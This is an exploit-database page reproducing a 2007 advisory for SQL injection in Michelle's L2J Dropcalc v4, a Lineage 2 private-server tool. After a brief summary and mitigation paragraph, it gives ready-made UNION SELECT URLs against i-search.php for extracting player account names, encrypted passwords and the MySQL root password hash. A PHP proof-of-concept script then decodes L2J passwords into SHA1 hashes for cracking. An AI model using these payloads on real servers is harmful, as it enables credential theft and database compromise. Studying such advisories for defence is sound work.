Michelle's L2J Dropcalc - exploit.company

vendor:

L2J Dropcalc

by:

Codebreak

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: L2J Dropcalc

Affected Version From: <= v4

Affected Version To: <= v4

Patch Exists: No

Related CWE: Not mentioned

CPE: Not mentioned

Metasploit:

Other Scripts:

Platforms Tested: Not mentioned

Not mentioned

Michelle’s L2J Dropcalc

The vulnerability allows an attacker to perform SQL injection attacks on the target website. By manipulating the 'username' and 'token' parameters in the URL, an attacker can execute arbitrary SQL queries and retrieve sensitive information from the database. The example provided demonstrates how to obtain a player's username, password, and even the MYSQL root password.

Mitigation:

To mitigate the vulnerability, the website should implement proper input validation and parameterized queries to prevent SQL injection attacks. Additionally, users should be educated about the risks of sharing sensitive information on insecure websites.

Source

Exploit-DB raw data:

#==============================================================================================
#  Title: Michelle's L2J Dropcalc
#  Version: <= v4
#  Web Site: http://www.msknight.com/comps/lineage2/myl2jdropcalc.htm
#
#  Discovered By: Codebreak (codebreak1984@gmail.com | www.codebreak.tk)
#
#==============================================================================================
#  SQL Injection: (*** Must be logged in, using your own username and Token ***)
#
#  http://[Target]/[Path]/i-search.php?itemid=&username=[User]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=[SQL]
#
#  Example:
#
#   Obtain a player username:
#   http://[Target]/[Path]/i-search.php?itemid=&username=[User]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,account_name,null,null,null,null,null from characters where char_name = "[PLAYER]"
#
#   Obtain a password for that username (*** encrypted): 
#    * only valid if loginserver and gameserver are in the same machine
#   http://[Target]/[Path]/i-search.php?itemid=&username=[User]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,password,null,null,null,null,null from accounts where login = "[USERNAME]"
#
#
#  Bonus:
#   
#   Obtain MYSQL Password (encrypted):
#    *only valid if the script is executed with root accounts.
#   http://[Target]/[Path]/i-search.php?itemid=&username=[User]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,Password,null,null,null,null,null from mysql.user where User = "root" and host="localhost"
#
#   *** L2J Encrypted Password can be decoded into a SHA1 hash. I've made a script to do that and it's included in this file
#
###############################################################################################


<--------- Beginning of PHP Script --------->

<style type="text/css">
<!--
.style3 {font-size: 24px}
.style1 {color: #CC0000}
-->
</style>
<?
echo("<title>L2J Pass Decoding - POC</title>");
$pass = $_POST['decode']; 
$unpass3 = base64_decode($pass);


$array = unpack("H*", $unpass3);
foreach ($array as $key => $value)
$unpass2 = $array[1];


echo("<span class=style1><b><u>Decoding Password</u></b></span>");

echo("<br><b>Base 64:</b> $pass<br>");
echo("<b>Unpacked:</b> $unpass3<br>");
echo("<br><b>SHA1:</b> $unpass2<br>");
?>
<form name="form1" method="post" action="">
  <div align="center">
    <input type="text" name="decode">
    <input type="submit" value="Decode">
  </div>
</form>
<br><br><br><center><i>Created by Codebreak</center></i>

<------------- End of Script ------------->

# milw0rm.com [2007-01-31]